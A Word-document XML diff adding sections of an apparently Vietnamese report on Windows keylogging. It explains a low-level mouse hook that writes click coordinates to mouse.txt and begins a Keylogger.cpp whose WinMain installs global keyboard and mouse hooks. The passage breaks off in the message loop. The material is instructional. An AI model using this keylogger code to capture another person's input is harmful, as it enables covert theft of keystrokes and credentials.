+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>return CallNextHookEx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(hMouseHook, nCode, wParam, lParam);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Tương tự đối với một Keyboard Hook Procedure, ta cũng có một Mouse Hook Procedure.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Một MSLLHOOKSTRUCT cũng có các trường gần tương tự KBDLLSTRUCT.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Trong đó có chứa các giá trị tọa độ của chuột</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, được gán vào x (chiều ngang) và y (chiều dọc)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">Có 4 macro khác nhau của tham số wParam: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WM_LBUTTONUP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WM_LBUTTONDOWN</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WM_RBUTTONUP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WM_RBUTTONDOWN</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tương ứng với sự kiện nhả chuột trái, click chuột trái, nhả chuột phải và click chuột phải.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ta thực hiện kiểm tra giống việc gõ phím, sau đó lấy tọa độ của chuột và ghi vào một file mouse.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:bookmarkStart w:id="27" w:name="_Toc60895363"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>. File Keylogger.cpp</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14064,13 +16152,638 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#include</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"KeyLogger.h"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WINAPI </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>WinMain</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nCmdShow){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    hKeyHook = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>SetWindowsHookEx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(WH_KEYBOARD_LL, (HOOKPROC)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>GetKey</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>GetModuleHandle</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(NULL), 0);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Mouse</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hook = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>SetWindowsHookEx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(WH_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>MOUSE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>_LL, (HOOKPROC)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Get</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Mouse</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>GetModuleHandle</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(NULL), 0);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    MSG msg;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>while</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>GetMessage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(&amp;msg, NULL, 0, 0)){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>TranslateMessage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(&amp;msg);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>DispatchMessage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(&amp;msg);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
